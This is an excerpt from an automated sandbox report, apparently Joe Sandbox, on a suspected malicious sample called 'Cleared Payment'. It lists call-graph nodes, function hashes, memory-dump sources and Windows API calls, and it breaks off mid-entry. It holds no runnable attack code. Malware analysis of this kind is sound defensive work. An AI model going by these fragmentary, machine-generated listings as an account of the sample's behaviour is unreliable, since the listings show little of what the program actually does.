6ba5d37 40385 6bab060 40377->40385 40391 6bab05b 40377->40391 40378 6ba5d71 40378->40373 40384 6ba497b 40381->40384 40382 6ba6ed8 40382->40377 40383 6ba5a60 2 API calls 40383->40382 40384->40382 40384->40383 40387 6bab0dd 40385->40387 40388 6bab091 40385->40388 40386 6bab09d 40386->40378 40387->40378 40388->40386 40396 6bab2d8 40388->40396 40399 6bab2d6 40388->40399 40392 6bab060 40391->40392 40393 6bab09d 40392->40393 40394 6bab2d8 2 API calls 40392->40394 40395 6bab2d6 2 API calls 40392->40395 40393->40378 40394->40393 40395->40393 40402 6bab318 40396->40402 40397 6bab2e2 40397->40387 40400 6bab2e2 40399->40400 40401 6bab318 2 API calls 40399->40401 40400->40387 40401->40400 40403 6bab31d 40402->40403 40404 6bab35c 40403->40404 40408 6bab5bd LoadLibraryExW 40403->40408 40409 6bab5c0 LoadLibraryExW 40403->40409 40404->40397 40405 6bab354 40405->40404 40406 6bab560 GetModuleHandleW 40405->40406 40407 6bab58d 40406->40407 40407->40397 40408->40405 40409->40405 40232 138d030 40233 138d048 40232->40233 40234 138d0a2 40233->40234 40239 6bad6c8 40233->40239 40243 6bad6c0 40233->40243 40247 6baa46c 40233->40247 40256 6bae81f 40233->40256 40240 6bad6ee 40239->40240 40241 6baa46c CallWindowProcW 40240->40241 40242 6bad70f 40241->40242 40242->40234 40244 6bad6c5 40243->40244 40245 6baa46c CallWindowProcW 40244->40245 40246 6bad70f 40245->40246 40246->40234 40248 6baa477 40247->40248 40249 6bae889 40248->40249 40251 6bae879 40248->40251 40281 6bae49c 40249->40281 40265 6bae9ab 40251->40265 40270 6bae9b0 40251->40270 40275 6baea7c 40251->40275 40252 6bae887 40258 6bae828 40256->40258 40257 6bae889 40259 6bae49c CallWindowProcW 40257->40259 40258->40257 40260 6bae879 40258->40260 40261 6bae887 40259->40261 40262 6bae9ab CallWindowProcW 40260->40262 40263 6baea7c CallWindowProcW 40260->40263 40264 6bae9b0 CallWindowProcW 40260->40264 40262->40261 40263->40261 40264->40261 40267 6bae9ae 40265->40267 40266 6baea50 40266->40252 40285 6baea68 40267->40285 40288 6baea63 40267->40288 40272 6bae9c4 40270->40272 40271 6baea50 40271->40252 40273 6baea68 CallWindowProcW 40272->40273 40274 6baea63 CallWindowProcW 40272->40274 40273->40271 40274->40271 40276 6baea3a 40275->40276 40277 6baea8a 40275->40277 40279 6baea68 CallWindowProcW 40276->40279 40280 6baea63 CallWindowProcW 40276->40280 40278 6baea50 40278->40252 40279->40278 40280->40278 40282 6bae4a7 40281->40282 40283 6bafcea CallWindowProcW 40282->40283 40284 6bafc99 40282->40284 40283->40284 40284->40252 40286 6baea79 40285->40286 40292 6bafc29 40285->40292 40286->40266 40289 6baea68 40288->40289 40290 6baea79 40289->40290 40291 6bafc29 CallWindowProcW 40289->40291 40290->40266 40291->40290 40293 6bae49c CallWindowProcW 40292->40293 40294 6bafc3a 40293->40294 40294->40286 40295 6ba3050 DuplicateHandle 40296 6ba30e6 40295->40296 40297 6bad510 40298 6bad578 CreateWindowExW 40297->40298 40300 6bad634 40298->40300

                                                            Executed Functions

                                                            Function 06BB55A8 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 141 6bb55a8-6bb55c5 142 6bb55c7-6bb55ca 141->142 143 6bb5653-6bb5659 142->143 144 6bb55d0-6bb55d3 142->144 145 6bb565f 143->145 146 6bb571e-6bb5728 143->146 147 6bb55e2-6bb55e5 144->147 148 6bb55d5-6bb55db 144->148 149 6bb5664-6bb5667 145->149 157 6bb572f-6bb5731 146->157 151 6bb55e7-6bb55ea 147->151 152 6bb55ef-6bb55f2 147->152 150 6bb55dd 148->150 148->151 155 6bb5669-6bb566f 149->155 156 6bb569f-6bb56a2 149->156 150->147 151->152 153 6bb5606-6bb5609 152->153 154 6bb55f4-6bb5601 152->154 160 6bb560b-6bb5611 153->160 161 6bb5618-6bb561b 153->161 154->153 158 6bb577f-6bb57ab 155->158 159 6bb5675-6bb567d 155->159 162 6bb56ae-6bb56b1 156->162 163 6bb56a4-6bb56ad 156->163 164 6bb5736-6bb5739 157->164 187 6bb57b5-6bb57b8 158->187 159->158 166 6bb5683-6bb5690 159->166 160->155 167 6bb5613 160->167 168 6bb561d-6bb5620 161->168 169 6bb5625-6bb5628 161->169 170 6bb56bf-6bb56c2 162->170 171 6bb56b3-6bb56ba 162->171 164->160 172 6bb573f-6bb5742 164->172 166->158 173 6bb5696-6bb569a 166->173 167->161 168->169 175 6bb562a-6bb5649 169->175 176 6bb564e-6bb5651 169->176 177 6bb56ca-6bb56cd 170->177 178 6bb56c4-6bb56c5 170->178 171->170 179 6bb575f-6bb5761 172->179 180 6bb5744-6bb575a 172->180 173->156 175->176 176->143 176->149 183 6bb56cf-6bb56d1 177->183 184 6bb56d4-6bb56d7 177->184 178->177 181 6bb5768-6bb576b 179->181 182 6bb5763 179->182 180->179 181->142 186 6bb5771-6bb577e 181->186 182->181 183->184 189 6bb56d9-6bb56eb 184->189 190 6bb56f0-6bb56f3 184->190 193 6bb57ba-6bb57cb 187->193 194 6bb57d0-6bb57d3 187->194 189->190 191 6bb5709-6bb570c 190->191 192 6bb56f5-6bb5704 190->192 196 6bb5719-6bb571c 191->196 197 6bb570e-6bb5712 191->197 192->191 193->194 199 6bb57e7-6bb57ea 194->199 200 6bb57d5-6bb57dc 194->200 196->146 196->164 197->186 206 6bb5714 197->206 203 6bb57ec-6bb57f3 199->203 204 6bb57f4-6bb57f7 199->204 201 6bb5892-6bb5899 200->201 202 6bb57e2 200->202 202->199 208 6bb57f9-6bb5803 204->208 209 6bb5808-6bb580b 204->209 206->196 208->209 210 6bb5829-6bb582c 209->210 211 6bb580d-6bb5811 209->211 215 6bb582e-6bb5832 210->215 216 6bb5846-6bb5849 210->216 213 6bb589a-6bb58d4 211->213 214 6bb5817-6bb581f 211->214 232 6bb58d6-6bb58d9 213->232 214->213 219 6bb5821-6bb5824 214->219 215->213 220 6bb5834-6bb583c 215->220 217 6bb584b-6bb584f 216->217 218 6bb5863-6bb5866 216->218 217->213 221 6bb5851-6bb5859 217->221 222 6bb5868-6bb586c 218->222 223 6bb5880-6bb5882 218->223 219->210 220->213 225 6bb583e-6bb5841 220->225 221->213 226 6bb585b-6bb585e 221->226 222->213 227 6bb586e-6bb5876 222->227 228 6bb5889-6bb588c 223->228 229 6bb5884 223->229 225->216 226->218 227->213 230 6bb5878-6bb587b 227->230 228->187 228->201 229->228 230->223 233 6bb58db-6bb58ec 232->233 234 6bb58f7-6bb58fa 232->234 240 6bb5cab-6bb5cb2 233->240 241 6bb58f2 233->241 235 6bb58fc-6bb58ff 234->235 236 6bb5926-6bb5aba 234->236 238 6bb591d-6bb5920 235->238 239 6bb5901-6bb5912 235->239 291 6bb5bf3-6bb5c06 236->291 292 6bb5ac0-6bb5ac7 236->292 238->236 242 6bb5c09-6bb5c0c 238->242 239->240 251 6bb5918 239->251 244 6bb5cb7-6bb5cb9 240->244 241->234 246 6bb5c1a-6bb5c1d 242->246 247 6bb5c0e-6bb5c15 242->247 249 6bb5cbb 244->249 250 6bb5cc0-6bb5cc3 244->250 252 6bb5c1f-6bb5c32 246->252 253 6bb5c35-6bb5c38 246->253 247->246 249->250 250->232 254 6bb5cc9-6bb5cd2 250->254 251->238 253->236 255 6bb5c3e-6bb5c41 253->255 256 6bb5c5f-6bb5c62 255->256 257 6bb5c43-6bb5c54 255->257 260 6bb5c7c-6bb5c7f 256->260 261 6bb5c64-6bb5c75 256->261 257->239 266 6bb5c5a 257->266 264 6bb5c89-6bb5c8c 260->264 265 6bb5c81-6bb5c86 260->265 261->252 271 6bb5c77 261->271 268 6bb5c8e-6bb5c9f 264->268 269 6bb5ca6-6bb5ca9 264->269 265->264 266->256 268->240 274 6bb5ca1 268->274 269->240 269->244 271->260 274->269 293 6bb5b7b-6bb5b82 292->293 294 6bb5acd-6bb5b00 292->294 293->291 295 6bb5b84-6bb5bb7 293->295 304 6bb5b02 294->304 305 6bb5b05-6bb5b46 294->305 307 6bb5bb9 295->307 308 6bb5bbc-6bb5be9 295->308 304->305 316 6bb5b48-6bb5b59 305->316 317 6bb5b5e-6bb5b65 305->317 307->308 308->254 316->254 318 6bb5b6d-6bb5b6f 317->318 318->254
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-3993045852
                                                            • Opcode ID: b2bcbcac6b2becaf18c3cbb90d3867779c73c53174b87cc146cbc1a18160dadd
                                                            • Instruction ID: 8a7f47d6d7181e1129969045a5465e7421653796fa3de04338198281afb23588
                                                            • Opcode Fuzzy Hash: b2bcbcac6b2becaf18c3cbb90d3867779c73c53174b87cc146cbc1a18160dadd
                                                            • Instruction Fuzzy Hash: BB2291B2F002558FDB74DFA4D4806EEB7B2EF85310F24A4A9D446AB344DAB5DC42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB65E8 Relevance: .8, Instructions: 812COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b48cde139ef910e5dc0fe376856e9447d07af888e19e5c52c938a6e6e344adcd
                                                            • Instruction ID: e4ef045eb53700cda9ecfb73ab0251f8d456b42d769b1855d14c84019ad86ff3
                                                            • Opcode Fuzzy Hash: b48cde139ef910e5dc0fe376856e9447d07af888e19e5c52c938a6e6e344adcd
                                                            • Instruction Fuzzy Hash: 9A629F70B002058FDB64DB68D584AEDB7F2EF88314F54A4A9D406DB394EBB5ED41CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBC170 Relevance: .6, Instructions: 641COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cd7eee9b5961b077f1f4ac3410db6b2557b8495ebefc5cbbc06f0522e3f948e
                                                            • Instruction ID: 817e39a9590842dd482028c455b6164e80667cdedce517eb729a6db467b921fc
                                                            • Opcode Fuzzy Hash: 4cd7eee9b5961b077f1f4ac3410db6b2557b8495ebefc5cbbc06f0522e3f948e
                                                            • Instruction Fuzzy Hash: 3F329471F102058FDB54EB68D880BAEBBB2FB88314F10A569D506EB355DBB4EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBB220 Relevance: .6, Instructions: 567COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8e79d804bdacaeaacdd81b9135a8e26a98375f863679ffc2d9e0591940aa2ff
                                                            • Instruction ID: b6ed22d8a57e92bb9be3f84a592fbcb7bd3334b78f682e3471553161a8916448
                                                            • Opcode Fuzzy Hash: a8e79d804bdacaeaacdd81b9135a8e26a98375f863679ffc2d9e0591940aa2ff
                                                            • Instruction Fuzzy Hash: 69227FB0E101098BEF64DA68D8907FDBBA2FB85310F60A56AD445DB392DEB4DC818B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3060 Relevance: .5, Instructions: 545COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be9dfdee74bceb3310a62bd60abe3e1c0d7274052c9ec4974f2219b4a9bdc5df
                                                            • Instruction ID: e5c3ba8b22babd01944fa1261a71d13f9b0c57d77d9bfbe1dcaf27fedcdce65c
                                                            • Opcode Fuzzy Hash: be9dfdee74bceb3310a62bd60abe3e1c0d7274052c9ec4974f2219b4a9bdc5df
                                                            • Instruction Fuzzy Hash: DB323231E1065ACFDB14EF75C8905ADB7B2FFD9300F1096AAD409AB254EF70A985CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB7D78 Relevance: .5, Instructions: 479COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f377cd386ece0888f4a4a7dcf7d614f3f5b886864cb48145a2b9fe62e6dba7c
                                                            • Instruction ID: a761c397e3df4d6a4fcaeda40d739be3f837ba9be7870ae6f5fe3204426fa952
                                                            • Opcode Fuzzy Hash: 1f377cd386ece0888f4a4a7dcf7d614f3f5b886864cb48145a2b9fe62e6dba7c
                                                            • Instruction Fuzzy Hash: 1A02B170B012168FDB64DF68D8906AEB7E6FF84300F149569E406DB384DBB5EC42CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BA2E02 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2E86
                                                            • GetCurrentThread.KERNEL32 ref: 06BA2EC3
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2F00
                                                            • GetCurrentThreadId.KERNEL32 ref: 06BA2F59
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 923f98b65a1fc5225c0665524bdaaa03c541afac2213c49503152e3a7cee7321
                                                            • Instruction ID: 8eaf76452ac99cd5fe6fa696cdefcb41e79d728c62c133a6a431cc687022dd5d
                                                            • Opcode Fuzzy Hash: 923f98b65a1fc5225c0665524bdaaa03c541afac2213c49503152e3a7cee7321
                                                            • Instruction Fuzzy Hash: 785165B190430A8FDB94DFA9D948BDEBBF1FF88314F24805DE009A7250DB756944CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BA2E08 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2E86
                                                            • GetCurrentThread.KERNEL32 ref: 06BA2EC3
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2F00
                                                            • GetCurrentThreadId.KERNEL32 ref: 06BA2F59
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 77aa91de72132830ba82c6eb833f22c7e3ce7df5f72e4a8be8a8ea3fb001dcc4
                                                            • Instruction ID: f7f044b1687d95e718af1996aea1b45771ecf0d3ae88030f525f1ab7fe31af82
                                                            • Opcode Fuzzy Hash: 77aa91de72132830ba82c6eb833f22c7e3ce7df5f72e4a8be8a8ea3fb001dcc4
                                                            • Instruction Fuzzy Hash: 5B5165B190030A8FDB94DFA9D948B9EBBF1FF88314F24805DE009A7250DB756940CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAB318 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 320 6bab318-6bab337 322 6bab339-6bab346 call 6baa28c 320->322 323 6bab363-6bab367 320->323 330 6bab348 322->330 331 6bab35c 322->331 324 6bab37b-6bab3bc 323->324 325 6bab369-6bab373 323->325 332 6bab3c9-6bab3d7 324->332 333 6bab3be-6bab3c6 324->333 325->324 377 6bab34e call 6bab5bd 330->377 378 6bab34e call 6bab5c0 330->378 331->323 334 6bab3fb-6bab3fd 332->334 335 6bab3d9-6bab3de 332->335 333->332 337 6bab400-6bab407 334->337 338 6bab3e9 335->338 339 6bab3e0-6bab3e7 call 6baa298 335->339 336 6bab354-6bab356 336->331 340 6bab498-6bab558 336->340 341 6bab409-6bab411 337->341 342 6bab414-6bab41b 337->342 344 6bab3eb-6bab3f9 338->344 339->344 372 6bab55a-6bab55d 340->372 373 6bab560-6bab58b GetModuleHandleW 340->373 341->342 345 6bab428-6bab431 call 6ba396c 342->345 346 6bab41d-6bab425 342->346 344->337 352 6bab43e-6bab443 345->352 353 6bab433-6bab43b 345->353 346->345 354 6bab461-6bab46e 352->354 355 6bab445-6bab44c 352->355 353->352 361 6bab470-6bab48e 354->361 362 6bab491-6bab497 354->362 355->354 357 6bab44e-6bab45e call 6ba81fc call 6baa2a8 355->357 357->354 361->362 372->373 374 6bab58d-6bab593 373->374 375 6bab594-6bab5a8 373->375 374->375 377->336 378->336
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06BAB57E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 4dc839566b5c17480e81589e2911ef74862fc6457bd9ee3070b3bb4cc291f0ce
                                                            • Instruction ID: c234115a1d1dfc2a1dad32c77649f64427bca8a9e1468d18fb021a648ed4e555
                                                            • Opcode Fuzzy Hash: 4dc839566b5c17480e81589e2911ef74862fc6457bd9ee3070b3bb4cc291f0ce
                                                            • Instruction Fuzzy Hash: F78158B0A04B058FD7A4DF2AD49075ABBF1FF88304F008A6ED496D7A50DB75E845CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02BCEA58 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 379 2bcea58-2bcea73 380 2bcea9d-2bceabc call 2bce1d0 379->380 381 2bcea75-2bcea9c 379->381 386 2bceabe-2bceac1 380->386 387 2bceac2-2bceb21 380->387 394 2bceb27-2bcebb4 GlobalMemoryStatusEx 387->394 395 2bceb23-2bceb26 387->395 399 2bcebbd-2bcebe5 394->399 400 2bcebb6-2bcebbc 394->400 400->399
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3325348851.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2bc0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83d71d50c34a34a3e5f3144d8015007d5ce928989bd3e1d3bc1e525e9103c3c1
                                                            • Instruction ID: a916e2a836fec7ee6809992697c79d24ba239cbf28555525349bd372a86a3eab
                                                            • Opcode Fuzzy Hash: 83d71d50c34a34a3e5f3144d8015007d5ce928989bd3e1d3bc1e525e9103c3c1
                                                            • Instruction Fuzzy Hash: CA412772E0439A8FCB14DF69D8403AEBBF5AFC9210F1485AAD504E7341EB749845CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAD507 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 403 6bad507-6bad576 405 6bad578-6bad57e 403->405 406 6bad581-6bad588 403->406 405->406 407 6bad58a-6bad590 406->407 408 6bad593-6bad5cb 406->408 407->408 409 6bad5d3-6bad632 CreateWindowExW 408->409 410 6bad63b-6bad673 409->410 411 6bad634-6bad63a 409->411 415 6bad680 410->415 416 6bad675-6bad678 410->416 411->410 417 6bad681 415->417 416->415 417->417
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BAD622
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 90e20cb4a6af7089cc8c6ed926867ff77d1e30e65e973109345aca8b8a057e44
                                                            • Instruction ID: 000eda0f904ba6d6363caf24bdd5c48926e3d12e92b268568c6a0d71320e2dd1
                                                            • Opcode Fuzzy Hash: 90e20cb4a6af7089cc8c6ed926867ff77d1e30e65e973109345aca8b8a057e44
                                                            • Instruction Fuzzy Hash: E451BEB1D043499FDB14CF99C884ADEBFB5FF48310F64866AE819AB210D771A885CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAD510 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 418 6bad510-6bad576 419 6bad578-6bad57e 418->419 420 6bad581-6bad588 418->420 419->420 421 6bad58a-6bad590 420->421 422 6bad593-6bad632 CreateWindowExW 420->422 421->422 424 6bad63b-6bad673 422->424 425 6bad634-6bad63a 422->425 429 6bad680 424->429 430 6bad675-6bad678 424->430 425->424 431 6bad681 429->431 430->429 431->431
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BAD622
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: fef0d29823e5655368e3c3c1e5a1d9b4a13a074e8c3816a6e56fcaa6ccf2bc71
                                                            • Instruction ID: d613c5a5e32f8faa94ff3991881a6f08a2e833d588e132ed907a885a60e6b936
                                                            • Opcode Fuzzy Hash: fef0d29823e5655368e3c3c1e5a1d9b4a13a074e8c3816a6e56fcaa6ccf2bc71
                                                            • Instruction Fuzzy Hash: 3241B0B1D04349DFDB14CF99C884ADEBBB5FF48310F24866AE818AB210D775A885CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAE49C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 432 6bae49c-6bafc8c 435 6bafd3c-6bafd5c call 6baa46c 432->435 436 6bafc92-6bafc97 432->436 443 6bafd5f-6bafd6c 435->443 438 6bafcea-6bafd22 CallWindowProcW 436->438 439 6bafc99-6bafcd0 436->439 441 6bafd2b-6bafd3a 438->441 442 6bafd24-6bafd2a 438->442 445 6bafcd9-6bafce8 439->445 446 6bafcd2-6bafcd8 439->446 441->443 442->441 445->443 446->445
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06BAFD11
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: e28d0368d64f7101d50f17211325b0aa96774beb87eec2ca96d6f33e8ab5f228
                                                            • Instruction ID: 0b6a3253212c6ca5bc71545cd2cb88e9c096bfb3c0a9421d3505329efb69f023
                                                            • Opcode Fuzzy Hash: e28d0368d64f7101d50f17211325b0aa96774beb87eec2ca96d6f33e8ab5f228
                                                            • Instruction Fuzzy Hash: E7415AB5904309CFDB44CF99C488BAABBF9FF88314F248499D519AB321D774A841CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BA3048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 449 6ba3048-6ba30e4 DuplicateHandle 450 6ba30ed-6ba310a 449->450 451 6ba30e6-6ba30ec 449->451 451->450
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BA30D7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: e1c1163c077c5b8bbba67b8b0683a3a52cbdb71fb3c60d1e66ef0e36486eab49
                                                            • Instruction ID: f4c263525580964ee7ba475d8f8977e2c24d60bbcdffd1945d44904fc828fef7
                                                            • Opcode Fuzzy Hash: e1c1163c077c5b8bbba67b8b0683a3a52cbdb71fb3c60d1e66ef0e36486eab49
                                                            • Instruction Fuzzy Hash: 6F21E3B5D00249DFDB10CFAAD984ADEBBF5EB48310F14805AE919A3350D375A954CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BA3050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 454 6ba3050-6ba30e4 DuplicateHandle 455 6ba30ed-6ba310a 454->455 456 6ba30e6-6ba30ec 454->456 456->455
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BA30D7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 5ca9858a3b0eb19b4c2830a710be9814ff92507a3ba518ae1150e504b24095f4
                                                            • Instruction ID: 99c956e7be22da5619ddb925105f6f3448d2301f024fa66dd8ce7ecc59e35878
                                                            • Opcode Fuzzy Hash: 5ca9858a3b0eb19b4c2830a710be9814ff92507a3ba518ae1150e504b24095f4
                                                            • Instruction Fuzzy Hash: C821B3B59003499FDB10CF9AD984ADEBBF4EB48320F14845AE914A3350D375A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAB779 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 459 6bab779-6bab7c0 461 6bab7c8-6bab7f7 LoadLibraryExW 459->461 462 6bab7c2-6bab7c5 459->462 463 6bab7f9-6bab7ff 461->463 464 6bab800-6bab81d 461->464 462->461 463->464
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BAB5F9,00000800,00000000,00000000), ref: 06BAB7EA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
